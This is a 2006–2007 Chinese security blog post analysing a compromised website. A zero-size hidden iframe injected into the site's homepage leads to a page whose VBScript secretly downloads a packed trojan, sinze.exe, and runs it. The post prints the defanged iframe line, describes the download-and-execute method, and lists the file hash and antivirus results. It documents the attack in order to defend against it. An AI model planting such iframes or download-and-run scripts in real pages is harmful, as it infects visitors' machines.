endurer 原创

2007-01-06 第2版 补充 Kaspersky 的反应
2006-12-27 第1

该网站首页被加入代码:
/-------
...<iframe src=hxxp://www..xj123***.net/ad***/*1***/*1 width=0 height=0 frameborder=0></iframe>
-------/打开 hxxp://www..xj123***.net/ad***/*1***/*1  会自动转到

hxxp://i***.the***c**.***.cn/*sinze***/sinze.htm打开这个 sinze.htm 网页,会看到信息:
/-------
就不让你看!气死你 by knel!
-------/

但这只是表面,该网页下面的 VBScript脚本代码会背地里会利用 Microsoft.XMLHTTP 和 scrīpting.FileSystemObject 下载文件 sinze.exe,保存为 %temp%g0ld.com,并利用Shell.Application 对象 的 ShellExecute 方法 来运行。

sinze.exe 采用 SVKP 1.3x -> Pavol Cerven 加壳。

/-------
文件说明符 : d:/test/sinze.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2006-12-11 4:25:57
修改时间 : 2006-12-11 4:25:58
访问时间 : 2006-12-27 0:0:0
大小 : 424621 字节 414.685 KB
MD5 : 1937f1ba8627794e232db40a11b8ec0f
-------/

瑞星19.03.12对此文件无反应。

由于昨晚南海海域发生地震,多条海底通信光缆中断,无法使用国外网站的多引擎扫描测试…… 

 

Scanned file:   sinze.exe - Infected

sinze.exe - infected by ​Trojan-Dropper.Win32.Agent.awq

Statistics:

Known viruses:

256347

Updated:

06-01-2007

File size (Kb):

415

Virus bodies:

1

Files:

1

Warnings:

0

Archives:

0

Suspicious:

0